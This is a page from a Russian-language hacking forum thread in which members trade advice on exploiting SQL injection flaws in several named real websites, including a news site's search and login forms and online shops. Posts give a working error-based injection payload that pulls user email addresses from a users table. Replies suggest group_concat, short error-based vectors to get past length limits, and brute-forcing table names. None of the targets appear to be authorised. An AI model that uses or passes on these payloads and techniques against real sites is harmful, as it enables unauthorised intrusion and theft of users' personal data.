HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23981  
Старый 01.01.2015, 19:31
x_Lex
Участник форума
Регистрация: 08.01.2005
Сообщений: 178
Провел на форуме:
2186077

Репутация: 438
По умолчанию

Цитата:
Сообщение от faza02  
faza02 said:
вы уверены, что доступа нет? может просто фильтруется? других способов получения имен таблиц нет. кроме грубой силы, само собой
нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema

Цитата:
Сообщение от Cennarios  
Cennarios said:
Во первых попробовать так: `information_schema`.xxx.
Во вторых, частенько бывает что права обрезают на information_schema.tables, стоит проверить information_schema.columns и выбирать оттуда
да перебрал все таблицы из базы information_schema по нулям 99.9% нет доступа к information_schema
 
Ответить с цитированием

  #23982  
Старый 02.01.2015, 16:24
vikler
Guest
Сообщений: n/a
Провел на форуме:
36068

Репутация: 0
По умолчанию

Код:
Code:
http://hollywoodnewswire.net/pubPages/other/search_results.php?searchStr=Photo%27
Там parameter length constraint mechanism. Как обойти для вывода?
 
Ответить с цитированием

  #23983  
Старый 02.01.2015, 16:46
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от vikler  
vikler said:
Код:
Code:
http://hollywoodnewswire.net/pubPages/other/search_results.php?searchStr=Photo%27
Там parameter length constraint mechanism. Как обойти для вывода?
чтобы не мучаться с этим, есть еще post sqli в форме входа

http://hollywoodnewswire.net/scripts/login.php

Цитата:
Сообщение от x_Lex  
x_Lex said:
нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema
тогда вспоминайте, мне данные способы неизвестны.
 
Ответить с цитированием

  #23984  
Старый 02.01.2015, 17:21
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от x_Lex  
x_Lex said:
нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema
Брут!
 
Ответить с цитированием

  #23985  
Старый 02.01.2015, 18:35
vikler
Guest
Сообщений: n/a
Провел на форуме:
36068

Репутация: 0
По умолчанию

Цитата:
Сообщение от faza02  
faza02 said:
чтобы не мучаться с этим, есть еще post sqli в форме входа
http://hollywoodnewswire.net/scripts/login.php
Да, я видела, и в форме "забыл пароль" тоже. Но их я не могу раскрутить. =\ Не подскажешь, какой там подход?
 
Ответить с цитированием

  #23986  
Старый 03.01.2015, 13:36
sysjuk
Guest
Сообщений: n/a
Провел на форуме:
69527

Репутация: 5
По умолчанию

Есть запрос "

Код:
Code:
/ru/users/?brands%5B%5D=9+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x27%2C0x7e%2Cusers.email%2C0x27%2C0x7e%29+from+%60dbname%60.users+Order+by+id+limit+4%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1
выводит:

Код:
Code:
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[21000]: Cardinality violation: 1242 Subquery returns more than 1 row' in /
куда копать?
 
Ответить с цитированием

  #23987  
Старый 03.01.2015, 14:29
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от sysjuk  
sysjuk said:
куда копать?
group_concat(users.email)

Цитата:
Сообщение от vikler  
vikler said:
Да, я видела, и в форме "забыл пароль" тоже. Но их я не могу раскрутить. =\ Не подскажешь, какой там подход?
error-based. однако, там тоже запрос режется, нужно узнать версию и выбрать самый короткий вектор

https://rdot.org/forum/showthread.php?t=325

например:



Код:
Code:
XPATH syntax error: '.73-log5.1.73-log'
 
Ответить с цитированием

  #23988  
Старый 03.01.2015, 21:40
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

Так какой же вектор применим к этому случаю?

Код:
Code:
xttp://www.wyrgorod.ru/shop/subcategory_10(*)_0.html
Error-based, который использовал BigBear ничего не дал, может быть это просто ошибка?
 
Ответить с цитированием

  #23989  
Старый 03.01.2015, 21:43
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=noscript'

не получается найти нужное направление, error based не помогает, что то можно придумать?

Код HTML:
HTML:
http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=n')+AND+(order+by+1
не выдает ошибки
 
Ответить с цитированием

  #23990  
Старый 03.01.2015, 22:35
Ravenous
Guest
Сообщений: n/a
Провел на форуме:
44130

Репутация: 26
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:
http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=noscript'
не получается найти нужное направление, error based не помогает, что то можно придумать?
Код HTML:
HTML:
http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=n')+AND+(order+by+1
не выдает ошибки
этож Magento, а какой скуле может быть речь?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ